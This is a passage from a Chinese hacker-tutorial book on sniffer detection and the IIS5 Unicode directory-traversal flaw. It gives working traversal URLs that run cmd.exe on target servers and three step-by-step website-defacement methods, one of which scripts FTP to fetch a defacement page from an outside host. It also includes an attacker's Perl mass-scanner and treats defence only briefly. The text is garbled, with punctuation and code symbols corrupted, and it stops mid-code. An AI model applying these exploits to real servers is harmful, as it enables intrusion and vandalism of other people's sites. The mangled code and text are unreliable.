《30天打造专业红客》第16章


4:利用arp数据包进行监测
这个方法和上面的差不多;它使用arp数据包替代了上述的icmp数据包而已;向局域网内的主机发送非广播方式的arp包,如果局域网内的某个主机响应了这个arp请求,那 么我们就可以判断它很可能就是处于网络监听模式了,这是目前相对而言比较好的监测模式。
(什么叫ARP?就说ARP协议;它是Address Resolution Protocol”(地址解析协议)的缩写;在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。)
昨天有些朋友说找不到一些网络监听的工具;你在。google。搜sniffer tools有很多的。
我就列举一些了
Windows平台下的:
Windump http://。xfocus。/tools/200108/238。html
相关介绍:http://security。zz。ha。cn/windump。html
注意这个是在NT下用的98就别用了,说到这想说一局如果你的系统是98或是ME的,最好换一个,因为好多很好的软件都要求是NT的
UNIX下:
Sniffithttp://。programsalon。/download。asp?type_id=53 第6个
该软件的安装介绍:http://。xfocus。/articles/200001/28。html
'第16天'IIS5 UNICODE 编码漏洞
unicode 漏洞是最容易让入侵者得手的一个漏洞;可以不费吹灰之力将主页改掉;重则删除
硬盘上的数据;高手甚至获取administrator 权限!
漏洞自大前年年10 月份公布至今;居然国内还有这么多的服务器存在着该漏洞
下面我从一般的入侵手法分析如何做相应的防护对策。
(一)unicode 漏洞的原理
有关漏洞的原理网上已经有很多相关的文章了;我不打算详细说;还是简单的来了解了解
好了!
实际上就是UNICODE 编码存在BUG,在UNICODE 编码中
%c1%1c …〉(0xc1 … 0xc0) * 0x40 + 0x1c = 0x5c = "/"
%c0%2f …〉(0xc0 … 0xc0) * 0x40 + 0x2f = 0x2f = ""
在NT4 中/编码为%c1%9c 。在英文版里:WIN2000 英文版%c0%af
该漏洞是利用扩展UNICODE 字符取代〃/〃和〃”而能利用〃。。/〃目录遍历;故在一台有
unicode 漏洞的服务器ip 后边加上/scripts/。。%c1%1c。。/winnt/system32/cmd。exe?/c+dir+c:就可
以看到主机上c 盘的所有文件及目录。
(二)unicode 漏洞的危害
未经授权的用户可能利用IUSR_machinename 账号的上下文空间访问任何已知的文件。
该账号在默认情况下属于Everyone 和Users 组的成员,因此任何与Web 根目录在同一逻辑
驱动器上的能被这些用户组访问的文件都能被删除;修改或执行,就如同一个用户成功登陆
所能完成的一样。
以上部分内容摘自绿盟!
(三)unicode 漏洞的攻击手法
1、利用漏洞修改主页
这可能是新手们最兴奋的事情了!每当他们成功地黑掉一个网页后都有一股极大的满足
感。然而黑网页也是最简单的事情。
手段描述一:入侵者先用扫描工具扫到有漏洞的主机后;在IE 的地址栏里输入http://主机
的ip/scripts/。。%c1%9c。。/winnt/system32/cmd。exe?/c+dir+c:就可以看到主机上c 盘的所有文件
了。要查主页放在什么地方的话;可以将后边的dir+c:换成set ;从返回的错误信息中找到
PATH_TRANSLATED=c:ipubroot 这一句(具体的路径根据具体的情况而定)。其中的
c:ipubroot 就是主页所在的地方!接着入侵者为了避免系统对特殊字符的检测;故将
本地机器的CMD。EXE 程序复制到主机的c:ipubscripts 目录中;这样干起活来就容易多了!
他们查到主页的名字后;就可以利用echo 命令来写入信息;将内容覆盖掉主页文件就把主页
给黑了。
手段描述二:除了上面的土方法外;入侵者可以将有声有色的黑页替换主页;这样黑得不是
更爽吗?来看看他们是如何做到的。
先在本地硬盘建立个共享文件夹(如gale);把黑页复制进去。照样把cmd。exe 拷贝到目标
的c:ipubscripts 下;名字为gale。exe,映射本地的gale 目录为目标的一个盘(如q:)
把q:里的复制到目标主机的网页目录去。覆盖对方的网页文件,最后断开映射就可以了。
这是利用本地共享目录和映射硬盘的方法替换黑页;如果黑页有背景又有音乐;文件很大;上
传费事;怎么完美一点呢?请看下边。
手段描述三:这种方法也是红客们黑美国、日本的时候最常用的手法。
入侵者先申请一个免费空间,把做好的黑页上传上去,然后利用echo 命令在目标主机
上建立一个文本文件,写上几行命令,如下:
目标主机ip/scripts/gale。exe?/c+echo+open+你黑页所在的免费空间ip》文本文件名。txt
目标主机ip/gale。exe?/c+echo+你在黑页空间上的帐户》》文本文件名。txt
目标主机ip/gale。exe?/c+echo+密码》》文本文件名。txt
目标主机ip/gale。exe?/c+echo+get+index。htm》》文本文件名。txt
目标主机ip/gale。exe?/c+echo+bye》》文本文件名。txt
目标主机ip/gale。exe?/c+ftp+…s:文本文件名。txt
这样入侵者就可以将黑页从另外一个空间下载到目标主机上,copy 过去覆盖就可以了。
这样入侵者不受地方的限制,随便什么地方了,比如网吧。
(四)unicode 漏洞的防护措施
说了那么多,现在该转入正题了,下面我来说说防范的措施,这也是从攻击中总结出来
的一些措施,希望对大家有帮助。
1、打上最新补丁
作为一个网络管理员,为了服务器的安全,需要不停的打上最新补丁,这是比较有效的
方法。但你要记住:在网络上;没有绝对的安全的,道高一尺;魔高一丈;完全相信防火墙和系
统补丁往往是很愚蠢的。
2、冷酷到底,拒人于千里之外
相信到现在还利用unicode 漏洞入侵的人都是些新手傻瓜们!他们没有确定的入侵目标,
只是抓个扫描器来乱扫一通,扫到就黑,扫不到就哭的那种。对付扫描器扫出未知的漏洞,
这是管理员的聪明之处。如何躲过扫描器的眼睛呢?请先看看下面一个用perl 写的扫描器代
码吧:
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room。
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c (其他版本的请修改这样的字符)
#perhaps a public script to do some evil stuff with this exploit later。。。 h0h0h0
#werd: all of rsh; 0x7f; hackweiser; rain forest puppy for researching the hole ='
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my def = new LWP::UserAgent;
my @host;
print 〃root shell hackersn〃;
print 〃iis cmd hole scannern〃;
print 〃coded by piffyn〃;
print 〃nWhat file contains the hosts: 〃;
chop (my hosts=);
open(IN; hosts) || die 〃nCould not open hosts: !〃;
while ()

host'a' = _;
chomp host'a';
a++;
b++;

close(IN);
a = 0;
print 〃ph34r; scan started〃;
while (a 《 b)

my url=〃http://host'a'/scripts/。。%c0%af。。/winnt/system32/cmd。exe?/c+dir+c: 〃;
my request = new HTTP::Request("GET"; url);
my response = def…》request(request);
if (response…》is_success) {
print response…》content;
open(OUT; 〃》》scaniis。log〃);
print OUT 〃nhost'a' : response…》content〃;
…close OUT;
} else {
print response…》error_as_HTML;

&second()

sub second() {
my url2=〃http://host'a'/scripts/。。%c1%9c。。/winnt/system32/cmd。exe?/c+dir+c: 〃;
my request = new HTTP::Request("GET"; url2);
my response = def…》request(request);
if (response…》is_success) {
print response…》content;
open(OUT; 〃》》scaniis。log〃);
print OUT 〃nhost'a' : response…》content〃;
…close OUT;
小说推荐
返回首页返回目录